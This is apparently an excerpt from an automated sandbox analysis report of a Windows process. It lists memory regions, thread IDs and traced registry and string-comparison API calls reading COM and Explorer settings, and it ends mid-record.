"pagefile_0x0000000001c00000" filename = "" Region: id = 1771 start_va = 0x1c00000 end_va = 0x1c04fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 1772 start_va = 0x1c00000 end_va = 0x1c04fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 1773 start_va = 0x1c00000 end_va = 0x1c04fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 1774 start_va = 0x1c00000 end_va = 0x1c04fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 1775 start_va = 0x1c00000 end_va = 0x1c04fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 1776 start_va = 0x1c00000 end_va = 0x1c04fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 1777 start_va = 0x1c00000 end_va = 0x1c04fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 1778 start_va = 0x1c00000 end_va = 0x1c04fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 1779 start_va = 0x1c00000 end_va = 0x1c04fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 1780 start_va = 0x1c00000 end_va = 0x1c04fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 1781 start_va = 0x1c00000 end_va = 0x1c04fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 1782 start_va = 0x1c00000 end_va = 0x1c04fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 1783 start_va = 0x1c00000 end_va = 0x1c04fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 1784 start_va = 0x1c00000 end_va = 0x1c04fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 1785 start_va = 0x1c00000 end_va = 0x1c04fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 1786 start_va = 0x1c00000 end_va = 0x1c04fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 1787 start_va = 0x1c00000 end_va = 0x1c04fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 1788 start_va = 0x1c00000 end_va = 0x1c04fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 1789 start_va = 0x1c00000 end_va = 0x1c04fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 1790 start_va = 0x1c00000 end_va = 0x1c04fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 1791 start_va = 0x1c00000 end_va = 0x1c04fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 1792 start_va = 0x1c00000 end_va = 0x1c04fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 1793 start_va = 0x1c00000 end_va = 0x1c04fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 1794 start_va = 0x1c00000 end_va = 0x1c04fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 1795 start_va = 0x1c00000 end_va = 0x1c04fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 1796 start_va = 0x1c00000 end_va = 0x1c04fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 1797 start_va = 0x1c00000 end_va = 0x1c04fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 1798 start_va = 0x1c00000 end_va = 0x1c04fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 1799 start_va = 0x1c00000 end_va = 0x1c04fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 1800 start_va = 0x1c00000 end_va = 0x1c04fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 2595 start_va = 0x260000 end_va = 0x260fff entry_point = 0x260000 region_type = mapped_file name = "2314.bin" filename = "\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\2314.bin" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\2314.bin") Region: id = 2921 start_va = 0x260000 end_va = 0x261fff entry_point = 0x260000 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 2922 start_va = 0x280000 end_va = 0x281fff entry_point = 0x280000 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 2923 start_va = 0x290000 end_va = 0x291fff entry_point = 0x290000 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 2924 start_va = 0x4660000 end_va = 0x475ffff entry_point = 0x4660000 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 2925 start_va = 0x55b0000 end_va = 0x56affff entry_point = 0x55b0000 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 2926 start_va = 0x5830000 end_va = 0x592ffff entry_point = 0x5830000 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 2927 start_va = 0xd580000 end_va = 0xda71fff entry_point = 0x0 region_type = private name = "private_0x000000000d580000" filename = "" Thread: id = 33 os_tid = 0x960 Thread: id = 34 os_tid = 0xb5c Thread: id = 35 os_tid = 0xb54 Thread: id = 36 os_tid = 0xb38 Thread: id = 37 os_tid = 0xb30 Thread: id = 38 os_tid = 0xb0c Thread: id = 39 os_tid = 0xb08 Thread: id = 40 os_tid = 0xb04 Thread: id = 41 os_tid = 0xb00 Thread: id = 42 os_tid = 0xafc Thread: id = 43 os_tid = 0xaf8 Thread: id = 44 os_tid = 0xaf4 Thread: id = 45 os_tid = 0xaf0 Thread: id = 46 os_tid = 0xaec Thread: id = 47 os_tid = 0xae8 Thread: id = 48 os_tid = 0xabc Thread: id = 49 os_tid = 0x988 Thread: id = 50 os_tid = 0x984 Thread: id = 51 os_tid = 0x974 Thread: id = 52 os_tid = 0x96c Thread: id = 53 os_tid = 0x968 Thread: id = 54 os_tid = 0x958 [0213.421] StrCmpIW (psz1="ActivationType", psz2="DelegateExecute") returned -1 [0213.421] RegGetValueW (in: hkey=0x124c, lpSubKey=0x0, lpValue="ActivationType", dwFlags=0x10, pdwType=0x0, pvData=0x71beba8, pcbData=0x71be9c0*=0x4 | out: pdwType=0x0, pvData=0x71beba8, pcbData=0x71be9c0*=0x4) returned 0x0 [0213.421] StrCmpIW (psz1="Threading", psz2="DelegateExecute") returned 1 [0213.421] RegGetValueW (in: hkey=0x124c, lpSubKey=0x0, lpValue="Threading", dwFlags=0x10, pdwType=0x0, pvData=0x71bebdc, pcbData=0x71be9c0*=0x4 | out: pdwType=0x0, pvData=0x71bebdc, pcbData=0x71be9c0*=0x4) returned 0x0 [0213.421] StrCmpIW (psz1="TrustLevel", psz2="DelegateExecute") returned 1 [0213.421] RegGetValueW (in: hkey=0x124c, lpSubKey=0x0, lpValue="TrustLevel", dwFlags=0x10, pdwType=0x0, pvData=0x71bebe4, pcbData=0x71be9c0*=0x4 | out: pdwType=0x0, pvData=0x71bebe4, pcbData=0x71be9c0*=0x4) returned 0x0 [0213.421] StrCmpIW (psz1="ActivateAsUser", psz2="DelegateExecute") returned -1 [0213.421] RegGetValueW (in: hkey=0x124c, lpSubKey=0x0, lpValue="ActivateAsUser", dwFlags=0x10, pdwType=0x0, pvData=0x71bec04, pcbData=0x71be9c0*=0x4 | out: pdwType=0x0, pvData=0x71bec04, pcbData=0x71be9c0*=0x4) returned 0x2 [0213.421] RegGetValueW (in: hkey=0x124e, lpSubKey="TreatAs", lpValue=0x0, dwFlags=0xffff, pdwType=0x0, pvData=0x71be8d0, pcbData=0x71be818*=0xc8 | out: pdwType=0x0, pvData=0x71be8d0, pcbData=0x71be818*=0xc8) returned 0x2 [0213.421] RegGetValueW (in: hkey=0x124e, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x71be720, pvData=0x0, pcbData=0x71be778*=0x0 | out: pdwType=0x71be720*=0x1, pvData=0x0, pcbData=0x71be778*=0x2c) returned 0x0 [0213.421] RegGetValueW (in: hkey=0x124e, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x71be720, pvData=0xd1ef510, pcbData=0x71be778*=0x2c | out: pdwType=0x71be720*=0x1, pvData="Network List Manager", pcbData=0x71be778*=0x2a) returned 0x0 [0213.422] RegGetValueW (in: hkey=0x124e, lpSubKey="InprocHandler32", lpValue=0x0, dwFlags=0x23, pdwType=0x71be6d0, pvData=0x0, pcbData=0x71be728*=0x0 | out: pdwType=0x71be6d0*=0x0, pvData=0x0, pcbData=0x71be728*=0x0) returned 0x2 [0213.422] RegGetValueW (in: hkey=0x124e, lpSubKey="InprocHandler", lpValue=0x0, dwFlags=0x23, pdwType=0x71be6d0, pvData=0x0, pcbData=0x71be728*=0x0 | out: pdwType=0x71be6d0*=0x0, pvData=0x0, pcbData=0x71be728*=0x0) returned 0x2 [0213.429] StrCmpIW (psz1="ActivationType", psz2="DelegateExecute") returned -1 [0213.429] RegGetValueW (in: hkey=0x3ac, lpSubKey=0x0, lpValue="ActivationType", dwFlags=0x10, pdwType=0x0, pvData=0x71be308, pcbData=0x71be120*=0x4 | out: pdwType=0x0, pvData=0x71be308, pcbData=0x71be120*=0x4) returned 0x0 [0213.429] StrCmpIW (psz1="Threading", psz2="DelegateExecute") returned 1 [0213.429] RegGetValueW (in: hkey=0x3ac, lpSubKey=0x0, lpValue="Threading", dwFlags=0x10, pdwType=0x0, pvData=0x71be33c, pcbData=0x71be120*=0x4 | out: pdwType=0x0, pvData=0x71be33c, pcbData=0x71be120*=0x4) returned 0x0 [0213.429] StrCmpIW (psz1="TrustLevel", psz2="DelegateExecute") returned 1 [0213.429] RegGetValueW (in: hkey=0x3ac, lpSubKey=0x0, lpValue="TrustLevel", dwFlags=0x10, pdwType=0x0, pvData=0x71be344, pcbData=0x71be120*=0x4 | out: pdwType=0x0, pvData=0x71be344, pcbData=0x71be120*=0x4) returned 0x0 [0213.429] StrCmpIW (psz1="ActivateAsUser", psz2="DelegateExecute") returned -1 [0213.429] RegGetValueW (in: hkey=0x3ac, lpSubKey=0x0, lpValue="ActivateAsUser", dwFlags=0x10, pdwType=0x0, pvData=0x71be364, pcbData=0x71be120*=0x4 | out: pdwType=0x0, pvData=0x71be364, pcbData=0x71be120*=0x4) returned 0x2 Thread: id = 55 os_tid = 0x950 Thread: id = 56 os_tid = 0x94c [0213.405] RegGetValueW (in: hkey=0x1262, lpSubKey="TreatAs", lpValue=0x0, dwFlags=0xffff, pdwType=0x0, pvData=0x70bd210, pcbData=0x70bd158*=0xc8 | out: pdwType=0x0, pvData=0x70bd210, pcbData=0x70bd158*=0xc8) returned 0x2 [0213.405] RegGetValueW (in: hkey=0x1262, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x70bd060, pvData=0x0, pcbData=0x70bd0b8*=0x0 | out: pdwType=0x70bd060*=0x1, pvData=0x0, pcbData=0x70bd0b8*=0x22) returned 0x0 [0213.405] RegGetValueW (in: hkey=0x1262, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x70bd060, pvData=0x360ad0, pcbData=0x70bd0b8*=0x22 | out: pdwType=0x70bd060*=0x1, pvData="PSFactoryBuffer", pcbData=0x70bd0b8*=0x20) returned 0x0 [0213.406] GetProcAddress (hModule=0x7ff977360000, lpProcName="StrCmpIW") returned 0x7ff97736be50 [0213.406] StrCmpIW (psz1="InprocServer32", psz2="DelegateExecute") returned 1 [0213.406] RegGetValueW (in: hkey=0x124e, lpSubKey=0x0, lpValue="InprocServer32", dwFlags=0x23, pdwType=0x70bcfb0, pvData=0x0, pcbData=0x70bd008*=0x0 | out: pdwType=0x70bcfb0*=0x0, pvData=0x0, pcbData=0x70bd008*=0x0) returned 0x2 [0213.406] RegGetValueW (in: hkey=0x124e, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x70bcff0, pvData=0x0, pcbData=0x70bd048*=0x0 | out: pdwType=0x70bcff0*=0x1, pvData=0x0, pcbData=0x70bd048*=0x46) returned 0x0 [0213.406] RegGetValueW (in: hkey=0x124e, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x70bcff0, pvData=0xd1bfe10, pcbData=0x70bd048*=0x46 | out: pdwType=0x70bcff0*=0x1, pvData="C:\\Windows\\System32\\BitsProxy.dll", pcbData=0x70bd048*=0x44) returned 0x0 [0213.406] StrCmpIW (psz1="ThreadingModel", psz2="DelegateExecute") returned 1 [0213.406] RegGetValueW (in: hkey=0x124e, lpSubKey=0x0, lpValue="ThreadingModel", dwFlags=0x20000003, pdwType=0x70bcfa0, pvData=0x70bcfc0, pcbData=0x70bcf88*=0x3c | out: pdwType=0x70bcfa0*=0x1, pvData="Both", pcbData=0x70bcf88*=0xa) returned 0x0 [0213.406] RegGetValueW (in: hkey=0x1262, lpSubKey="InprocHandler32", lpValue=0x0, dwFlags=0x23, pdwType=0x70bd010, pvData=0x0, pcbData=0x70bd068*=0x0 | out: pdwType=0x70bd010*=0x0, pvData=0x0, pcbData=0x70bd068*=0x0) returned 0x2 [0213.406] RegGetValueW (in: hkey=0x1262, lpSubKey="InprocHandler", lpValue=0x0, dwFlags=0x23, pdwType=0x70bd010, pvData=0x0, pcbData=0x70bd068*=0x0 | out: pdwType=0x70bd010*=0x0, pvData=0x0, pcbData=0x70bd068*=0x0) returned 0x2 [0213.411] RegGetValueW (in: hkey=0x124e, lpSubKey="TreatAs", lpValue=0x0, dwFlags=0xffff, pdwType=0x0, pvData=0x70bcfd0, pcbData=0x70bcf18*=0xc8 | out: pdwType=0x0, pvData=0x70bcfd0, pcbData=0x70bcf18*=0xc8) returned 0x2 [0213.411] RegGetValueW (in: hkey=0x124e, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x70bce20, pvData=0x0, pcbData=0x70bce78*=0x0 | out: pdwType=0x70bce20*=0x1, pvData=0x0, pcbData=0x70bce78*=0x22) returned 0x0 [0213.411] RegGetValueW (in: hkey=0x124e, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x70bce20, pvData=0x5cb27c0, pcbData=0x70bce78*=0x22 | out: pdwType=0x70bce20*=0x1, pvData="PSFactoryBuffer", pcbData=0x70bce78*=0x20) returned 0x0 [0213.411] StrCmpIW (psz1="InprocServer32", psz2="DelegateExecute") returned 1 [0213.411] RegGetValueW (in: hkey=0x3ae, lpSubKey=0x0, lpValue="InprocServer32", dwFlags=0x23, pdwType=0x70bcd70, pvData=0x0, pcbData=0x70bcdc8*=0x0 | out: pdwType=0x70bcd70*=0x0, pvData=0x0, pcbData=0x70bcdc8*=0x0) returned 0x2 [0213.412] RegGetValueW (in: hkey=0x3ae, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x70bcdb0, pvData=0x0, pcbData=0x70bce08*=0x0 | out: pdwType=0x70bcdb0*=0x1, pvData=0x0, pcbData=0x70bce08*=0x46) returned 0x0 [0213.412] RegGetValueW (in: hkey=0x3ae, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x70bcdb0, pvData=0xd1bdbb0, pcbData=0x70bce08*=0x46 | out: pdwType=0x70bcdb0*=0x1, pvData="C:\\Windows\\System32\\BitsProxy.dll", pcbData=0x70bce08*=0x44) returned 0x0 [0213.412] StrCmpIW (psz1="ThreadingModel", psz2="DelegateExecute") returned 1 [0213.412] RegGetValueW (in: hkey=0x3ae, lpSubKey=0x0, lpValue="ThreadingModel", dwFlags=0x20000003, pdwType=0x70bcd60, pvData=0x70bcd80, pcbData=0x70bcd48*=0x3c | out: pdwType=0x70bcd60*=0x1, pvData="both", pcbData=0x70bcd48*=0xa) returned 0x0 [0213.412] RegGetValueW (in: hkey=0x124e, lpSubKey="InprocHandler32", lpValue=0x0, dwFlags=0x23, pdwType=0x70bcdd0, pvData=0x0, pcbData=0x70bce28*=0x0 | out: pdwType=0x70bcdd0*=0x0, pvData=0x0, pcbData=0x70bce28*=0x0) returned 0x2 [0213.412] RegGetValueW (in: hkey=0x124e, lpSubKey="InprocHandler", lpValue=0x0, dwFlags=0x23, pdwType=0x70bcdd0, pvData=0x0, pcbData=0x70bce28*=0x0 | out: pdwType=0x70bcdd0*=0x0, pvData=0x0, pcbData=0x70bce28*=0x0) returned 0x2 [0213.412] RegGetValueW (in: hkey=0x124e, lpSubKey="TreatAs", lpValue=0x0, dwFlags=0xffff, pdwType=0x0, pvData=0x70bcde0, pcbData=0x70bcd28*=0xc8 | out: pdwType=0x0, pvData=0x70bcde0, pcbData=0x70bcd28*=0xc8) returned 0x2 [0213.412] RegGetValueW (in: hkey=0x124e, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x70bcc30, pvData=0x0, pcbData=0x70bcc88*=0x0 | out: pdwType=0x70bcc30*=0x1, pvData=0x0, pcbData=0x70bcc88*=0x22) returned 0x0 [0213.412] RegGetValueW (in: hkey=0x124e, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x70bcc30, pvData=0x5cb27c0, pcbData=0x70bcc88*=0x22 | out: pdwType=0x70bcc30*=0x1, pvData="psfactorybuffer", pcbData=0x70bcc88*=0x20) returned 0x0 [0213.412] StrCmpIW (psz1="InprocServer32", psz2="DelegateExecute") returned 1 [0213.412] RegGetValueW (in: hkey=0x3ae, lpSubKey=0x0, lpValue="InprocServer32", dwFlags=0x23, pdwType=0x70bcb80, pvData=0x0, pcbData=0x70bcbd8*=0x0 | out: pdwType=0x70bcb80*=0x0, pvData=0x0, pcbData=0x70bcbd8*=0x0) returned 0x2 [0213.412] RegGetValueW (in: hkey=0x3ae, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x70bcbc0, pvData=0x0, pcbData=0x70bcc18*=0x0 | out: pdwType=0x70bcbc0*=0x1, pvData=0x0, pcbData=0x70bcc18*=0x46) returned 0x0 [0213.413] RegGetValueW (in: hkey=0x3ae, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x70bcbc0, pvData=0xd1be100, pcbData=0x70bcc18*=0x46 | out: pdwType=0x70bcbc0*=0x1, pvData="C:\\Windows\\System32\\BitsProxy.dll", pcbData=0x70bcc18*=0x44) returned 0x0 [0213.413] StrCmpIW (psz1="ThreadingModel", psz2="DelegateExecute") returned 1 [0213.413] RegGetValueW (in: hkey=0x3ae, lpSubKey=0x0, lpValue="ThreadingModel", dwFlags=0x20000003, pdwType=0x70bcb70, pvData=0x70bcb90, pcbData=0x70bcb58*=0x3c | out: pdwType=0x70bcb70*=0x1, pvData="both", pcbData=0x70bcb58*=0xa) returned 0x0 [0213.413] RegGetValueW (in: hkey=0x124e, lpSubKey="InprocHandler32", lpValue=0x0, dwFlags=0x23, pdwType=0x70bcbe0, pvData=0x0, pcbData=0x70bcc38*=0x0 | out: pdwType=0x70bcbe0*=0x0, pvData=0x0, pcbData=0x70bcc38*=0x0) returned 0x2 [0213.413] RegGetValueW (in: hkey=0x124e, lpSubKey="InprocHandler", lpValue=0x0, dwFlags=0x23, pdwType=0x70bcbe0, pvData=0x0, pcbData=0x70bcc38*=0x0 | out: pdwType=0x70bcbe0*=0x0, pvData=0x0, pcbData=0x70bcc38*=0x0) returned 0x2 [0213.413] RegGetValueW (in: hkey=0x124e, lpSubKey="TreatAs", lpValue=0x0, dwFlags=0xffff, pdwType=0x0, pvData=0x70bccf0, pcbData=0x70bcc38*=0xc8 | out: pdwType=0x0, pvData=0x70bccf0, pcbData=0x70bcc38*=0xc8) returned 0x2 [0213.413] RegGetValueW (in: hkey=0x124e, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x70bcb40, pvData=0x0, pcbData=0x70bcb98*=0x0 | out: pdwType=0x70bcb40*=0x1, pvData=0x0, pcbData=0x70bcb98*=0x22) returned 0x0 [0213.413] RegGetValueW (in: hkey=0x124e, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x70bcb40, pvData=0x5cb27c0, pcbData=0x70bcb98*=0x22 | out: pdwType=0x70bcb40*=0x1, pvData="PSFactoryBuffer", pcbData=0x70bcb98*=0x20) returned 0x0 [0213.413] StrCmpIW (psz1="InprocServer32", psz2="DelegateExecute") returned 1 [0213.413] RegGetValueW (in: hkey=0x3ae, lpSubKey=0x0, lpValue="InprocServer32", dwFlags=0x23, pdwType=0x70bca90, pvData=0x0, pcbData=0x70bcae8*=0x0 | out: pdwType=0x70bca90*=0x0, pvData=0x0, pcbData=0x70bcae8*=0x0) returned 0x2 [0213.414] RegGetValueW (in: hkey=0x3ae, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x70bcad0, pvData=0x0, pcbData=0x70bcb28*=0x0 | out: pdwType=0x70bcad0*=0x1, pvData=0x0, pcbData=0x70bcb28*=0x46) returned 0x0 [0213.414] RegGetValueW (in: hkey=0x3ae, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x70bcad0, pvData=0xd1bdf70, pcbData=0x70bcb28*=0x46 | out: pdwType=0x70bcad0*=0x1, pvData="C:\\Windows\\System32\\BitsProxy.dll", pcbData=0x70bcb28*=0x44) returned 0x0 [0213.414] StrCmpIW (psz1="ThreadingModel", psz2="DelegateExecute") returned 1 [0213.414] RegGetValueW (in: hkey=0x3ae, lpSubKey=0x0, lpValue="ThreadingModel", dwFlags=0x20000003, pdwType=0x70bca80, pvData=0x70bcaa0, pcbData=0x70bca68*=0x3c | out: pdwType=0x70bca80*=0x1, pvData="Both", pcbData=0x70bca68*=0xa) returned 0x0 [0213.414] RegGetValueW (in: hkey=0x124e, lpSubKey="InprocHandler32", lpValue=0x0, dwFlags=0x23, pdwType=0x70bcaf0, pvData=0x0, pcbData=0x70bcb48*=0x0 | out: pdwType=0x70bcaf0*=0x0, pvData=0x0, pcbData=0x70bcb48*=0x0) returned 0x2 [0213.414] RegGetValueW (in: hkey=0x124e, lpSubKey="InprocHandler", lpValue=0x0, dwFlags=0x23, pdwType=0x70bcaf0, pvData=0x0, pcbData=0x70bcb48*=0x0 | out: pdwType=0x70bcaf0*=0x0, pvData=0x0, pcbData=0x70bcb48*=0x0) returned 0x2 [0213.414] RegGetValueW (in: hkey=0x124e, lpSubKey="TreatAs", lpValue=0x0, dwFlags=0xffff, pdwType=0x0, pvData=0x70bcc00, pcbData=0x70bcb48*=0xc8 | out: pdwType=0x0, pvData=0x70bcc00, pcbData=0x70bcb48*=0xc8) returned 0x2 [0213.414] RegGetValueW (in: hkey=0x124e, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x70bca50, pvData=0x0, pcbData=0x70bcaa8*=0x0 | out: pdwType=0x70bca50*=0x1, pvData=0x0, pcbData=0x70bcaa8*=0x22) returned 0x0 [0213.414] RegGetValueW (in: hkey=0x124e, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x70bca50, pvData=0x5cb27c0, pcbData=0x70bcaa8*=0x22 | out: pdwType=0x70bca50*=0x1, pvData="PSFactoryBuffer", pcbData=0x70bcaa8*=0x20) returned 0x0 [0213.414] StrCmpIW (psz1="InprocServer32", psz2="DelegateExecute") returned 1 [0213.414] RegGetValueW (in: hkey=0x3ae, lpSubKey=0x0, lpValue="InprocServer32", dwFlags=0x23, pdwType=0x70bc9a0, pvData=0x0, pcbData=0x70bc9f8*=0x0 | out: pdwType=0x70bc9a0*=0x0, pvData=0x0, pcbData=0x70bc9f8*=0x0) returned 0x2 [0213.415] RegGetValueW (in: hkey=0x3ae, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x70bc9e0, pvData=0x0, pcbData=0x70bca38*=0x0 | out: pdwType=0x70bc9e0*=0x1, pvData=0x0, pcbData=0x70bca38*=0x46) returned 0x0 [0213.415] RegGetValueW (in: hkey=0x3ae, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x70bc9e0, pvData=0xd1bd840, pcbData=0x70bca38*=0x46 | out: pdwType=0x70bc9e0*=0x1, pvData="C:\\Windows\\System32\\BitsProxy.dll", pcbData=0x70bca38*=0x44) returned 0x0 [0213.415] StrCmpIW (psz1="ThreadingModel", psz2="DelegateExecute") returned 1 [0213.415] RegGetValueW (in: hkey=0x3ae, lpSubKey=0x0, lpValue="ThreadingModel", dwFlags=0x20000003, pdwType=0x70bc990, pvData=0x70bc9b0, pcbData=0x70bc978*=0x3c | out: pdwType=0x70bc990*=0x1, pvData="Both", pcbData=0x70bc978*=0xa) returned 0x0 [0213.415] RegGetValueW (in: hkey=0x124e, lpSubKey="InprocHandler32", lpValue=0x0, dwFlags=0x23, pdwType=0x70bca00, pvData=0x0, pcbData=0x70bca58*=0x0 | out: pdwType=0x70bca00*=0x0, pvData=0x0, pcbData=0x70bca58*=0x0) returned 0x2 [0213.415] RegGetValueW (in: hkey=0x124e, lpSubKey="InprocHandler", lpValue=0x0, dwFlags=0x23, pdwType=0x70bca00, pvData=0x0, pcbData=0x70bca58*=0x0 | out: pdwType=0x70bca00*=0x0, pvData=0x0, pcbData=0x70bca58*=0x0) returned 0x2 Thread: id = 57 os_tid = 0x948 Thread: id = 58 os_tid = 0x944 Thread: id = 59 os_tid = 0x940 Thread: id = 60 os_tid = 0x93c Thread: id = 61 os_tid = 0x938 Thread: id = 62 os_tid = 0x920 Thread: id = 63 os_tid = 0x91c Thread: id = 64 os_tid = 0x918 Thread: id = 65 os_tid = 0x914 Thread: id = 66 os_tid = 0x910 Thread: id = 67 os_tid = 0x90c Thread: id = 68 os_tid = 0x908 Thread: id = 69 os_tid = 0x904 [0252.476] SetEvent (hEvent=0xa0c) returned 1 [0271.613] StrCmpIW (psz1="ValidateRegItems", psz2="DelegateExecute") returned 1 [0271.613] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", lpValue="ValidateRegItems", dwFlags=0x10000012, pdwType=0x5faeee0, pvData=0x5faeee8, pcbData=0x5faeee4*=0x4 | out: pdwType=0x5faeee0*=0x0, pvData=0x5faeee8, pcbData=0x5faeee4*=0x4) returned 0x2 [0271.613] StrCmpIW (psz1="MonitorRegistry", psz2="DelegateExecute") returned 1 [0271.613] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", lpValue="MonitorRegistry", dwFlags=0x10000012, pdwType=0x5faeee0, pvData=0x5faeee8, pcbData=0x5faeee4*=0x4 | out: pdwType=0x5faeee0*=0x4, pvData=0x5faeee8*=0x1, pcbData=0x5faeee4*=0x4) returned 0x0 [0271.622] StrCmpIW (psz1="ValidateRegItems", psz2="DelegateExecute") returned 1 [0271.622] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UsersFiles\\NameSpace", lpValue="ValidateRegItems", dwFlags=0x10000012, pdwType=0x5fadb60, pvData=0x5fadb68, pcbData=0x5fadb64*=0x4 | out: pdwType=0x5fadb60*=0x0, pvData=0x5fadb68, pcbData=0x5fadb64*=0x4) returned 0x2 [0271.622] StrCmpIW (psz1="MonitorRegistry", psz2="DelegateExecute") returned 1 [0271.622] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UsersFiles\\NameSpace", lpValue="MonitorRegistry", dwFlags=0x10000012, pdwType=0x5fadb60, pvData=0x5fadb68, pcbData=0x5fadb64*=0x4 | out: pdwType=0x5fadb60*=0x0, pvData=0x5fadb68, 